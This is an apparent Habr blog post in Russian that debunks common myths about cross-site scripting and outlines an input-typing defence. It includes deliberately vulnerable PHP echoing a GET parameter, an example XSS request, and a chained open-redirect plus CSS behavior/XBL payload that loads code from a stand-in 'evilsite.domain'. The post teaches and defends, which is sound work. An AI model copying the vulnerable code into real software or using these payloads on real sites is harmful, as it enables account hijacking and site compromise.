С учетом распространенных среди разработчиков мифов и заблуждений о межсайтовом выполнении сценариев, нет ничего удивительного в том, что он и по сегодняшний день входит в число наиболее распространенных проблем безопасности веб-приложений.
Должен признаться, что чтение комментариев на Хабре к практически любым постам, описывающим очередную XSS на каком-либо популярном сервисе или сайте, способно повергнуть в уныние любого, кто так или иначе связан с безопасностью веб-приложений. С учетом распространенных среди разработчиков мифов и заблуждений о межсайтовом выполнении сценариев, нет ничего удивительного в том, что он и по сегодняшний день входит в число наиболее распространенных проблем безопасности веб-приложений: согласно данным отчета Positive Technologies за 2010-2011 годы, XSS были подвержены 40% проанализированных веб-приложений, а из отчета Firehost за второй квартал 2012 года следует, что XSS составила 27% от числа зарегистрированных хостером атак.
И поскольку, заминусовать этот пост можно и за один только его заголовок, то поспешу пояснить: межсайтовое выполнение сценариев действительно не является уязвимостью, но только потому, что оно является атакой. В чем разница, почему это важно, как со всем этим бороться и какие еще мифы и заблуждения распространены об XSS — читаем под катом.
Все заблуждения сформулированы в заголовках, порядок произвольный, любые совпадения примеров конкретных атак и уязвимостей с реально существующими — случайны и непреднамеренны.
Как уже было сказано выше, это не так. Межсайтовое выполнение сценариев является атакой, причем и по версии OWASP, и по версии WASC (хотя читать мануалыклассификации у нас конечно не принято). Иными словами, XSS является лишь одним из возможных способов эксплуатации уязвимости определенного класса. Например, следующий код содержит только одну уязвимость, но подвержен атакам сразу нескольких классов:
<?php
header( 'Refresh: 5; url=' . $_GET['url']);
?>
<html>
<head>
<meta http-equiv="refresh" content="5;url=<?=$_GET['url']?>"></meta>
</head>
</html>
Во-первых, данный код подвержен атаке злоупотребления функционалом перенаправления, ни имеющей никакого отношения к XSS. Во-вторых, запросом вида http://localhost/?url="><script>alert("XSS")</script><!--
легко и непринужденно реализуется, собственно, межсайтовое выполнение сценариев. В третьих, если веб-приложение будет развернуто в окружении, которое использует канонический PHP версии ниже 4.4.2 или 5.1.2, либо ряд сторонних реализаций PHP, то данный код будет также уязвим и к атакам расщепления и сокрытия HTTP-ответов (а защищенность веб-приложения не должна зависеть от защищенности окружения настолько, насколько это возможно).
Разница между уязвимостью и атакой в том, что устранение уязвимости позволяет избавится и от всех эксплуатирующих ее атак, а вот устранение конкретной атаки — от самой уязвимости не избавляет. Простой пример: если мы, рассматривая данную XSS как уязвимость, устраним ее с помощью URL-кодирования каждого фрагмента переданного скрипту URL'а, то на возможность проведения атаки злоупотребления функционалом перенаправления это совершенно не повлияет — злоумышленник по-прежнему будет иметь возможность перенаправить пользователя на произвольный, корректно сформированный URL. Вместо того, чтобы бороться со следствиями, мы должны побороть причину, а именно — устранить ту самую, единственную уязвимость, которая позволяет проводить все эти атаки. В данном случае, уязвимость заключается в том, что GET-параметр url не обрабатывается должным образом ни при передаче в скрипт веб-сервером, ни перед его использованием в выходных данных. Прошу любить и жаловать: данная уязвимость относится к классам неправильной обработки входных и выходных данных и является самой распространенной уязвимостью, благодаря которой возможно проведение большинства известных на сегодняшний день атак. Следовательно, чтобы устранить эту уязвимость, необходимо обеспечить правильную и достаточную обработку данных обоих типов, при этом очевидно, что в данном случае, URL-кодирование достаточным не является. Мы еще вернемся к этому вопросу чуть позже.
«Когда тебе станет совсем скучно — затей с коллегами спор о терминологии» (С). Но тут уже вопрос принципиальный, простите. Я не знаю, благодаря кому именно, русскоговорящим разработчикам была навязана эта гейская классификация (есть мнение, что ее распространению способствовала статья об XSS в русской Википедии), но подобное разделение, хотя и имеет место, тем не менее совершенно бесполезно, т.к. не отражает всех свойств конкретной XSS, реально значимых с точки зрения анализа защищенности веб-приложения и устранения в нем соответствующих уязвимостей. Традиционно и ошибочно принято считать, что XSS может быть пассивной (требующей передать пользователю специально сформированную ссылку и убедить его по ней пройти) и активной (хранящейся на сервере и срабатывающей без лишних телодвижений со стороны пользователя). Однако же, рассмотрим следующий пример: допустим, что в движке Хабра есть уязвимость, позволяющая выйти лишь за рамки атрибута src
тега <a>
в тексте хабратопика, но не позволяющая выйти за рамки тега. Понятно, что данную уязвимость, можно использовать для проведения атаки XSS, определив обработчик наведения курсора на ссылку, щелчка по ней и т.п. Вопрос: пассивной или активной является такая атака? С одной стороны, ссылка хранится на сервере, ее не нужно доставлять атакуемым пользователям, вроде бы активная. С другой, для успешной атаки необходимы дополнительные действия пользователя, что характерно исключительно для пассивных атак. Парадокс? Именно поэтому, XSS принято классифицировать по двум критериям: вектору и способу воздействия. Второй как раз и является теми самыми «активная/пассивная», однако с более внятными формулировками: активной является XSS не требующая каких-либо лишних действий со стороны пользователя с точки зрения функционала веб-приложения, в отличии от пассивной. А по вектору воздействия, XSS делится на отраженную (возвращаемую сервером в ответ на тот же запрос, в котором был передан вектор эксплуатации), устойчивую (сохраняемую на сервере и доступную во всех ответах на один и тот же запрос, не содержащий вектор эксплуатации) и основанную на объектной модели документа (проведение которой возможно без отправки каких-либо запросов на сервер). Таким образом, правильным ответом на вопрос о классификации приведенного примера атаки является: «устойчивая-пассивная».
Очевидно, что это не совсем так. Для того, чтобы выполнить произвольный сценарий в браузере жертвы, достаточно было бы заманить его на специально подготовленную страницу, размещенную на контролируемом злоумышленником сервере. XSS же направлена не просто на выполнение произвольного сценария, а на его выполнение в контексте источника конкретного сайта с целью обхода политик единого источника (Same Origin Policy, SOP) и, в результате, получения доступа к данным и функционалу клиентской части веб-приложения в рамках пользовательской сессии и с правами ее пользователя. Это атака, в первую очередь, на веб-приложение, реализующая угрозу именно в нем, а не в браузере пользователя.
На конференции PHDays 2012, во время секции "Безопасность Web 2.0. Продвинутые техники" ее ведущий Андерс Рьянчо задал аудитории простой вопрос: «поднимите руки те, кто знает что такое политики единого источника». Как присутствовавший там, готов подтвердить: руки подняло от силы треть аудитории, состоящей целиком и полностью из веб-разработчиков и экспертов по безопасности. На видео этот исторический момент есть, жаль только, что вся аудитория в этот момент не попала в кадр. Честно говоря, я не совсем понимаю, как можно быть разработчиком или экспертом по безопасности веба и не знать об основном механизме защиты современных браузеров, поэтому для себя решил, что народ просто постеснялся поднимать руку перед иностранцем. Однако, даже простой обзор этих политик — задача не на пару абзацев, поэтому всех интересующихся могу направить во вторую часть электронной книги "Browser Security Handbook" Михаля Залевски. Еще глубже эта тема охвачена в "The Tangled Web" того же автора. Обе кстати, рекомендуются к прочтению всеми, кто имеет отношение к веб-разработке или анализу защищенности веб-приложений.
Не совсем понятно, с чего это вдруг атака на веб-приложение (см. выше) стала проблемой пользователя, а не владельца или разработчиков этого приложения. Тут скорее вопрос в том, какова их позиция в вопросах обеспечения защищенной работы пользователей. Риски, связанные с реализацией XSS, действительно зачастую носят репутационный характер. Однако же, если говорить о том, насколько серьезными могут быть последствия успешной XSS в отношении пользователей, рекомендую посмотреть доклад моего коллеги Дениса Баранова «Root через XSS», представленный на конференции ZeroNights 2011 и посвященный получению привилегированного доступа к компьютерам веб-разработчиков через атаку межсайтового выполнения сценариев (к сожалению, доступны только слайды, но общая идея, думаю будет понятна и без видео). Насколько сильным будет ущерб, нанесенный репутации ресурса, если с помощью XSS на его клиентскую часть, атакующие получат неограниченный доступ к компьютерам его пользователей? С учетом того, что средства, превращающие проведение массовой XSS в скрипткиддинг уже давно есть: взять, хотя бы, тот же BeEF. Кроме того, не стоит забывать также и о том, что с точки зрения XSS, администраторы веб-приложений являются точно такими же пользователями, как и все остальные (чьими проблемами якобы и является борьба с этим классом атак, ага).
Не только. Например, одним из способов применения уже упомянутой атаки расщепления HTTP-ответа, является внедрение HTML-документа (а следовательно и клиентских сценариев, если это необходимо) прямо в HTTP-заголовок, подверженный инъекции. Злоупотребление функционалом перенаправления вполне может быть использовано для редиректа браузера на URL'ы, использующие схему data: или javascript:. Более того, возможно и более неочевидное использование атаки на перенаправление с целью проведения XSS. Допустим, в нашем веб-приложении, помимо точки входа с уже рассмотренной проблемой перенаправления (доступной по адресу /redirect.php?url=
) есть также точка со следующим кодом:
<html>
<head>
<link rel="stylesheet" href="/themes/<?=$theme?>.css" type="text/css" />
</head>
$theme
, получаемой из параметров GET-запроса, сводится к удалению из нее всех кавычек, а также обратных слешей и тегов (так, на всякий случай), что делает невозможным для атакующего выбраться за пределы атрибута href. Однако, для проведения XSS этого и не требуется. Используя в качестве параметра $theme
значение ../redirect.php?url=http://evilsite.domain/evilstylesheet
атакующий получает возможность внедрить в страницу произвольный лист стилей. Используя для IE или FF лист с содержимымbody {
behavior:url(../redirect.php?url=http://evilsite.domain/evilscript.htc);
}
body {
-moz-binding: url(../redirect.php?url=http://evilsite.domain/evilscript.xml#evilcode);
}
<PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("XSS");
}
</SCRIPT>
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="mycode">
<implementation>
<constructor>
alert("XSS");
</constructor>
</implementation>
</binding>
</bindings>
он добивается успешной XSS для пользователей этих двух браузеров. Разумеется, то же самое касается и возможности осуществления инъекции непосредственно в определения стилей.
UPD: Как подсказали в комментариях, -moz-binding не так давно приказал долго жить, увы.
Большинство векторов XSS, доступных для атакующего в тех или иных браузерах и версиях HTML, перечислено на сайте HTML5 Security Cheatsheet. Там же можно найти и исчерпывающий ответ на вопрос, озвученный в заголовке этого раздела.
В первую очередь, необходимо выявить все потоки данных, целостность или аутентичность которых не контролируется внутри рассматриваемого компонента веб-приложения. Под компонентом веб-приложения, как правило (хотя и не всегда), подразумеваются элементы его серверной или клиентской части, выполняющиеся в рамках одного процесса ОС.
В приведенном выше примере, недоверенными (и единственными) данными является параметр url, получаемый из строки GET-запроса.
Как можно ближе к месту появления таких данных в компоненте, необходимо обеспечить их приведение к ожидаемым типам. В статических языках это реализуется, собственно, приведением к типу или созданием экземпляра этого типа на основе десериализации или парсинга проверямых данных. Более того, в большинстве современных фреймворков, построенных на статических языках, этот функционал уже реализован в механизмах биндинга параметров запроса к объектам модели. В динамических языках все несколько грустнее, т.к. по сути там можно говорить только об имитации приведения (которую, тем не менее, необходимо осуществлять). Тем не менее, грамотная реализация даже такой условной типизации даст гарантию, что по нашему компоненту будут гулять данные именно тех типов, на работу с которыми он рассчитан. Вся дальнейшая работа с данными внутри компонента, должна осуществляться только через созданные на основе входных данных объекты. Важно помнить, что основным принципом этапа типизации является как можно меньшее количество объектов строкового типа на его выходе. URL, адреса электропочты, дата, время и т.п. после типизации должны представлять из себя объекты конкретных типов, отличных от строкового. В виде строк должны быть представлены только те данные, которые на самом деле являются строкой, т.е. которые действительно могут содержать произвольный полноалфавитный текст.
В нашем случае, достаточно воспользоваться функцией parse_url() и реализовать проверку появления в элементах полученного массива лишних знаков подчеркивания, означающих наличие в исходном URL запрещенных символов (соответственно, завершать типизацию с ошибкой, если были обнаружены такие символы или если parse_url() и вовсе вернула FALSE). В том случае, если в полученном массиве будет присутствовать ключ query, необходимо также обеспечить его разбор с помощью parse_str() и заменить на получившийся в итоге ассоциативный массив с параметрами запроса.
Но доступ к знаниям открыт для всех